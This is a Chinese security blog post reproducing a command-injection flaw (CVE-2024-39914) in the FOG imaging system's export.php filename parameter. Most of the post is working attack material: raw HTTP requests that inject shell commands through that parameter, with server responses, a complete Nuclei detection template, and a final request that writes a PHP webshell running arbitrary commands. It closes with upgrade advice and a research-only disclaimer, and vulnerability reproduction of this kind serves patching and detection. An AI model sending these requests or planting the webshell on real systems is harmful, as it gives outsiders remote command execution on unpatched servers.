FOG < 1.5.10.34版本
FOG是一款克隆/成像/救援套件/库存管理系统。在版本低于1.5.10.34的情况下,FOG中的packages/web/lib/fog/reportmaker.class.php文件受到命令注入漏洞的影响,该漏洞存在于/fog/management/export.php的文件名参数中。此漏洞已在版本1.5.10.34中得到修复。
body="FOG Project"
第一步,打开首页瞅一眼
第二步,向靶场发送如下数据包,核心是向qzjtyryy.php文件写入随机字符串echo+'kpvyggzrnonvuycaipvl'+>+qzjtyryy.php
POST /fog/management/export.php?filename=$(echo+'kpvyggzrnonvuycaipvl'+>+qzjtyryy.php)&type=pdf HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36Content-Length: 25Connection: closeContent-Type: application/x-www-form-urlencoded; charset=UTF-8Accept-Encoding: gzip
响应内容如下
HTTP/1.1 200 OKConnection: closeContent-Length: 0Cache-Control: no-store, no-cache, must-revalidateContent-Disposition: attachment; filename=$(echo 'kpvyggzrnonvuycaipvl' > qzjtyryy.php).pdfContent-Security-Policy: default-src 'none';script-src 'self' 'unsafe-eval';connect-src 'self';img-src 'self' data:;style-src 'self' 'unsafe-inline';font-src 'self';Content-Type: application/pdfDate: Fri, 19 Jul 2024 01:20:08 GMTExpires: Thu, 19 Nov 1981 08:52:00 GMTPragma: no-cacheServer: Apache/2.4.37 (Rocky Linux) OpenSSL/1.1.1kSet-Cookie: PHPSESSID=9k547umgoipd3k1giph5bh287j; path=/Strict-Transport-Security: max-age=31536000X-Content-Type-Options: nosniffX-Frame-Options: sameoriginX-Powered-By: PHP/7.2.24X-Xss-Protection: 1; mode=block
第三步,访问回显文件
GET /fog/management/qzjtyryy.php HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Connection: closeAccept-Encoding: gzipCookie: PHPSESSID=9k547umgoipd3k1giph5bh287j
响应内容如下
HTTP/1.1 200 OKConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Date: Fri, 19 Jul 2024 01:20:08 GMTServer: Apache/2.4.37 (Rocky Linux) OpenSSL/1.1.1kX-Powered-By: PHP/7.2.24kpvyggzrnonvuycaipvl
漏洞复现成功
参考链接
https://github.com/FOGProject/fogproject/security/advisories/GHSA-7h44-6vq6-cq8jpoc文件内容如下
id: CVE-2024-39914info:name: FOG 在 /fog/management/export.php?filename= 中存在命令注入漏洞author: fgzseverity: criticaldescription: FOG是一款克隆/成像/救援套件/库存管理系统。在版本低于1.5.10.34的情况下,FOG中的packages/web/lib/fog/reportmaker.class.php文件受到命令注入漏洞的影响,该漏洞存在于/fog/management/export.php的文件名参数中。此漏洞已在版本1.5.10.34中得到修复。metadata:: 1: body="FOG Project"verified: truevariables:file_name: "{{to_lower(rand_text_alpha(8))}}"file_content: "{{to_lower(rand_text_alpha(20))}}"rboundary: "{{to_lower(rand_text_alpha(29))}}"requests:raw:|+POST /fog/management/export.php?filename=$(echo+'{{file_content}}'+>+{{file_name}}.php)&type=pdf HTTP/1.1Host: {{Hostname}}: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36Connection: close: application/x-www-form-urlencoded; charset=UTF-8fogguiuser=fog&nojson=2|GET /fog/management/{{file_name}}.php HTTP/1.1Host: {{Hostname}}: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15: gzipmatchers:type: dsldsl:"status_code_1 == 200 && status_code_2 == 200 && contains(body_2, '{{file_content}}')"
写入webshell
POST /fog/management/export.php?filename=$(echo+'<?php+echo+shell_exec($_GET['"'cmd'"']);+?>'+>+rce.php)&type=pdf HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36Connection: closeContent-Type: application/x-www-form-urlencoded; charset=UTF-8fogguiuser=fog&nojson=2
升级到最新版本。漏洞利用成本非常低,请尽快修复。
~~~点赞的大佬最帅~~~
原文始发于微信公众号(AI与网安):【在野】CVE-2024-39914 漏洞复现 poc exp
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论